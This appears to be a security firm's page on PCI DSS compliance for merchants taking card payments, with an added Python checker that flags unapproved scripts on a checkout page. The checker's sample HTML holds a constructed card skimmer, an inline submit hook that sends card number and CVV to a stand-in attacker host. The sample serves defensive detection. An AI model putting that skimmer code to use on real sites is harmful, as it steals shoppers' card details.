Whether you are an online retailer who has taken credit card payments for years, or a business that has recently started taking credit card payments so that clients can pay their bills, there are a few important things you should consider.

Any business taking credit card payments will have signed a merchant agreement with their bank. One of the terms of that merchant agreement is that the business must comply with the Payment Card Industry Data Security Standard (PCI DSS), which sets out the security controls required to protect cardholder data.

Here are links to the PCI DSS pages of the major banks:

BNZ

ANZ

Westpac

KiwiBank

Many businesses will not realise that they have this contractual obligation. Even if you use a third-party payment gateway, you still need to confirm that the rest of your website is secure, because the checkout page that hands the client over to the gateway is still yours. Criminals who compromise your website can inject a script into that page which copies the card details to a server they control at the moment the client types them in, while the client believes the details are going only to the secure payment gateway.
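The compromise described above usually takes the form of a script added to the checkout page. As an added example (not code from the original page or from the service it describes), the Python below parses a checkout page, lists every script it loads, and flags any external script whose host is not on an allowlist and any inline script whose SHA-256 digest has not been approved. The checkout HTML, the hosts shop.example, js.gateway.example and cdn-stats.example.net, and the allowlist itself are all constructed for the example.

```python
"""Flag scripts on a checkout page that are not on the approved list.

Added example, not part of the original page or its service. Every host,
hash and HTML fragment below is constructed for illustration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: the shop's own host and the payment gateway's script host are the
# only places a legitimate checkout page should load scripts from.
PAGE_HOST = "shop.example"
APPROVED_SCRIPT_HOSTS = {"shop.example", "js.gateway.example"}

# Constructed checkout page. The two scripts that mention cdn-stats.example.net
# stand in for an injected skimmer: one external file and one inline hook that
# copies the card form to the attacker before the gateway ever sees it.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://js.gateway.example/v1/checkout.js"></script>
<script src="/static/cart.js"></script>
<script src="https://cdn-stats.example.net/analytics.js"></script>
</head><body>
<form id="payment" action="https://js.gateway.example/pay" method="post">
<input name="card_number"><input name="cvv"><button>Pay</button>
</form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var p = new URLSearchParams(new FormData(this)).toString();
  navigator.sendBeacon('https://cdn-stats.example.net/c', p);
});
</script>
</body></html>
"""


class _ScriptCollector(HTMLParser):
    """Collects external script src values and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def collect_scripts(html):
    """Return (external_srcs, inline_bodies) for every <script> on the page."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    return collector.external, collector.inline


def inline_script_digests(html):
    """SHA-256 hex digest of each inline script body, in page order.
    (CSP hash sources use base64 of the same digest; hex is used here for readability.)"""
    return [hashlib.sha256(body.encode("utf-8")).hexdigest()
            for body in collect_scripts(html)[1]]


def find_unexpected_scripts(html, page_host=PAGE_HOST,
                            approved_hosts=APPROVED_SCRIPT_HOSTS,
                            approved_inline_hashes=frozenset()):
    """Return (kind, detail) findings for every script not on the allowlist."""
    external, inline = collect_scripts(html)
    findings = []
    for src in external:
        # A relative src has no host and is served by the shop itself.
        host = urlparse(src).hostname or page_host
        if host not in approved_hosts:
            findings.append(("external", src))
    for body in inline:
        digest = hashlib.sha256(body.encode("utf-8")).hexdigest()
        if digest not in approved_inline_hashes:
            findings.append(("inline", digest))
    return findings


if __name__ == "__main__":
    for kind, detail in find_unexpected_scripts(SAMPLE_CHECKOUT_HTML):
        print(f"UNEXPECTED {kind} script: {detail}")
```

Run against the constructed page this reports the external analytics.js script and the inline submit hook; once the developer approves an inline script by adding its digest to the allowlist, only the foreign host remains. It is the same comparison a Content-Security-Policy with host and hash sources makes in the browser, and running it against the live checkout page after each deployment catches script changes between the quarterly scans.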

If criminals do manage to steal the credit card details of your clients, the penalties from your bank can include:

  • Fines of up to USD 500,000
  • A mandatory review of your security (at your cost)
  • Removal of your ability to take credit card payments

And your reputation with your clients will obviously suffer. This can have a far greater impact. You may have implemented security measures in other parts of your business, but the loss of credit card data will make clients question whether you can be trusted with the rest of their information.

To avoid this outcome, businesses need to do the following:

  • Make sure your website is secure
  • Make sure that any other methods of taking credit card payments are secure (for example over the phone or in person)
  • Make sure that credit card information is stored securely (it’s best not to store it at all)
  • Complete an annual Self Assessment Questionnaire (see below) confirming that the required security controls are in place
  • Run external vulnerability scans of the website at least quarterly to show that it is still secure (the standard requires these quarterly scans to be performed by a PCI-approved scanning vendor, an ASV)

Our PCI DSS Compliance Service is a cost-effective way for you to meet your obligations and reduce the risk to your clients and your business.

We work with you and your web developer to complete the Self Assessment Questionnaire. If there are areas where you are non-compliant we will provide recommendations to bring you up to the required standard. We also scan your website every month to look for vulnerabilities that could be used by criminals. If the scans show issues we advise you and your web developers and provide recommendations on how to resolve them.

If you’d like to discuss this service in more detail, please get in touch.